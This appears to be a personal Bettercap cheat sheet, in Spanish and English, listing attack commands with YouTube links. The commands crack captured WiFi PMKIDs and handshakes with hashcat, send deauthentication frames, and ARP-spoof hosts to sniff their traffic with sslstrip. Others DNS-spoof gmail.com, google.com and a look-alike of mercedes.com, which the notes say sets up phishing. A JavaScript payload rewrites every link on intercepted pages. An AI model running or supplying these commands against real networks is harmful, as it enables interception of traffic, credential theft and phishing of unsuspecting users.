Bettercap

sudo su
airmon-ng start wlan0
bettercap
set wifi.interface wlan0mon
wifi.recon on
wifi.show

We now need to associate with an access point using the BSSID.

wifi.assoc 68:14:01:5a:0e:9c

Similarly, if you want to capture PMKID of all the Access Points,

wifi.assoc all

We now need to convert this pcap file in Hashcat format and crack it as we did before, so:

hcxpcaptool -z hashpmkid bettercap-wifi-handshake.pcap
hashcat -m 16800 --force hashpmkid /usr/share/wordlists/rockyou.txt --show

https://www.youtube.com/watch?v=krMaMcIX0Kc&pp=ygUQI2thbGlsaW51eGJyYXppbA%3D%3D

https://www.youtube.com/watch?v=Jg8bF_CnSAU

https://www.youtube.com/watch?v=sDTy32H9Hww&pp=ygUJI2FycHNwb29m

help
net.probe on
net.show
set arp.spoof.targets 192.168.1.58
arp.spoof on
net.sniff on
net.sniff off
clear
set dns.spoof.domains myamazon.com
dns.spoof on
help http.proxy
set http.proxy.injectjs ./java-script.js  
http.proxy on

window.onload = function(){
    console.log("Hacked website");
    anchors = document.getElementsByTagName("a");
    for (var i = 0; i < anchors.length; i++){
        anchors[i].href = "https://www.hackthissite.org";
    }
}

http.proxy on
caplets.show
net.probe on
help arp.spoof
set arp.spoof.internal true
set arp.spoof.targets 192.168.94.128
arp.spoof on
set net.sniff.output /home/esotericwarfare/pentest.pcap
set net.sniff.verbose true
net.sniff on
set https.proxy.sslstrip true
sudo wireshark /home/esotericwarfare/pentest.pcap
Buscar por http
Botón derecho - Follow - HTTP Stream
help dns.spoof
ping victim_website.com
set dns.spoof.address ip_victim_website.com
set dns.spoof.domains gmail.com,www.gmail.com,https://gmail.com
dns.spoof on
dns.spoof off
set dns.spoof.domains google.com,www.google.com,https://google.com/gmail/about/
dns.spoof on
set dns.spoof.address 192.168.94.133
dns.spoof off
dns.spoof on
set dns.spoof.all true
set dns.spoof.domains testphp.vulnweb.com/login.php,testphp.vulnweb.com,vulnweb.com
dns.spoof on
set wifi.recon.channel 3
set net.sniff.verbose true
set net.sniff.output wpa.pcap
net.sniff on
wifi.show
wifi.deauth bbsid
exit
Abrí la captura wpa.pcap con wireshark
y podés romper el cifrado con aircrack o wpa auditor
help arp.spoof
arp.spoof on
set arp.spoof.fullduplex true
arp -a 
set arp.spoof.targets 192.168.73.134
arp.spoof on
ahora volvé a ejecutar arp -a y verás ips cambiadas
---

net.probe on
net.show
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.223.18
arp.spoof on
net.sniff on
---
net.probe on
set arp.spoof.targets 10.0.0.3 10.0.0.1
arp.spoof on
net.sniff on
net.sniff off
clear
sudo service apache2 start
set dns.spoof.domains merdeces.com
dns.spoof on
Ahora mercedes.com redirige a una pagina local, así podemos hacer un ataque de phishing 
---
caplets.update
https://hstspreload.org

https://www.youtube.com/watch?v=iU1jwD8mwZk

https://www.youtube.com/watch?v=I0DVb8Op248&pp=ygUNI25pZmZwYXNzd29yZA%3D%3D

https://www.youtube.com/watch?v=6oZsqMqr_vc

https://www.youtube.com/watch?v=q3KJGhcc7g4

https://www.youtube.com/watch?v=FcZdiYQy2L0&pp=ygUUI2RlY3J5cHRpbmdhbm9ueW1pdHk%3D

https://www.youtube.com/watch?app=desktop&v=XSmhO7I2XdQ&t=9s

https://www.youtube.com/watch?v=w_k4d8n_2HE

https://www.youtube.com/watch?v=Peu0AEpHUVs

https://www.youtube.com/watch?v=yXsZFvochqw

https://www.youtube.com/watch?v=m-H9W9ZOzBI

https://www.youtube.com/watch?v=-rSqbgI7oZM

https://www.youtube.com/watch?v=jcffMHk_TZA

https://www.youtube.com/watch?v=ST1aUXFzY00&vl=en

https://www.youtube.com/watch?v=oqUX-YH1-Ao

Bettercap

February 16, 2025 Wifi

February 16, 2025
Wifi